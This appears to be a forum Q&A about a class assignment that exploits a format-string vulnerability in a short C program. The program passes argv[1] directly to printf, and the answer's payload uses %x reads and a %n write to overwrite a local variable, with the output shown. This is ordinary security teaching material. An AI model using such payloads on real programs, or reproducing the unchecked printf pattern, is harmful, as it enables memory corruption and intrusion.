Exploiting Printf Vulnerability in C

Question

As part of an assignment, I am expected to exploit the printf() vulnerability in the C code shared below. It should be in a way that when I run the code with a string (eg. ./format "foo"), I should change the "1" in "X equals to 1" with something else. I believe I need to change the value of X variable but if you have a different idea, please do not hesitate to share. Here is the code:

#include <stdio.h>
#include <stdlib.h>
int main (int argc, char **argv)
{
    int *p;
    int x = 1;
    p=&x;
    printf("x=%d, sizeof(x): %zu, %x = %p, sizeof((p):%zu,&p = %p, \n", x, sizeof(x), &x, sizeof(p),&p);
    printf(argv[1]);
    printf("\nX equals: %d \n", x);
    return 0;
}

Answer 1

You can find a pretty decent information ( Format string attack ) about vulnerabilities in print when no using validations properly.

I played a little with it and when running the program with like this:

./format "Bob %x %x %x %x %x %x %x %x%n" 

Will cause the following print:

x=1, sizeof(x): 4, &x = 0x7fffa9c36e14, sizeof((p):8,&p = 0x7fffa9c36e18,
Bob 81688000 81464ab0 3 81688048 3 a9c36f08 400410 a9c36f00
X equals: 59

If you replace the %n with %x you will be able to see the address of the variable x . Because %x reads from the process memory and %n writes to the process memory I was able to change the data inside of x (59 is the number of characters up to %n when printing)